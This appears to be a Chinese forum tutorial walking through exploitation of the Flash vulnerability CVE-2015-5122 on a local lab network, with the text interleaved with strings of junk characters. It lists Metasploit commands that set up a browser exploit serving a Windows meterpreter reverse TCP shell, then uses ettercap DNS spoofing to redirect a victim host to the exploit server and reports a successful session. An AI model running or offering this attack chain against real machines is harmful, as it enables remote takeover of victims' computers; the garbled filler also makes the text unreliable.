q: s! j( Q1 F4 S& v- z 二、cve2015-5122漏洞实例演示虚拟机 : |% d: T. ?) R6 a" e8 _
% R/ p v4 T& v) w; k
+ L; Y0 S! ^6 M- } 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
7 h5 L' n: H7 K5 p. g% I; Q* V $ m7 O5 ~ u8 o& L
" A1 w1 C. K9 ~+ H search cve-2015-5122如图:
4 B6 Z# }' e7 L1 M ( l# R# w+ ^) n/ T0 @
3 g7 {; R& _, ~( H) n, @
) ^& J- V% W3 p4 l/ @) B) _) x
5 |5 |' |; v" ]8 y, G* s2 @6 K, |
下面我们敲如下命令: " P6 u6 V$ o: k* X g
% v% Z, l* i5 J; X+ w5 s ?! d
& t/ L' e1 [1 |: W use exploit/multi/browser/adobe_flash_opaque_background_uaf
. ?4 b" Z9 C) s0 k9 O7 X
9 c3 ]2 L7 ?; G% j- H$ e3 D* b+ n" d5 [7 Z7 N0 b
set PAYLOAD windows/meterpreter/reverse_tcp
* O k* r! O- _8 f8 _+ { 9 q3 `6 B- x) }% e2 L" e* P
2 J" z5 b) {' A& {) p. E6 {6 t: q
set LHOST 192.168.0.109
: L( F5 N! j& G& _ L8 `0 U. Q4 B* x. Y/ I2 J
Q3 U5 A4 K5 |- i: A" e4 @
set URIPATH / /*根目录*/
7 N2 M& r5 n8 Q. n' p 9 s2 S5 S6 W- O9 X) G
2 N) H3 ] a' }! N5 I
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
7 H9 r3 z% k. k* T# K
0 ]: ^! [* D- t* ^1 d5 g
. B6 w! S1 {/ x! B% b9 e set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
0 f) H. K F) b0 r# c0 B( x+ k. k 8 ]8 K% ~5 B# y4 N& m
' l; i0 g8 w1 j$ Z! r+ @; F* L 然后show options如图: 0 ]3 m* K: u% \: K0 O0 Y$ L
. b6 w6 {5 L5 o8 z6 B1 m, r; x7 Q, P3 A' @
0 V; l0 s0 f3 S+ X4 m + z/ l+ N: G, L6 `- e
- G4 W: @% Y* {; e 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
3 @3 J2 B$ w- w2 U8 l$ B9 n( c
6 w6 |& P; X5 k! z g$ D* s. n. a) u0 l% m, U3 f8 q* S
: Y) y5 z I0 [+ ] 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 9 v% W) n9 ]+ t5 u
4 J' k& R& }. I) d" f7 J/ {+ ]5 p
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
; B3 F+ `! @+ w9 i. A$ J$ H
5 y6 G" n* w C( }+ [; q5 }6 Q9 w" R I! }" n
k% M/ w2 U u+ j+ ?
& Y; q8 Q' f; t$ N$ }* G5 v# J6 Y" v$ f
成功了,这时候我们断开ettercap,如图: 0 Z! [: n4 Z% l# O6 V
! X+ H6 S( Q" h- x/ V. N
4 K: H1 f0 v0 B: w: l
3 h1 _2 V+ X, i8 O1 d+ x
/ m! Q! p$ E4 K. m' F1 ?/ Z' r, B1 o0 s( [6 n
Screenshot如图: " I- Q2 Q8 I! A9 E0 @: J
9 [/ u% v% ?# M; j U& S
7 I) U* |* _6 @0 G; a P
/ g n# d0 j; Y# [. T9 K" H
/ j4 E: n& }. G
8 } N( N; A6 v. m; ~' R `$ W " l% j9 M, \ }- X$ W( w6 K
|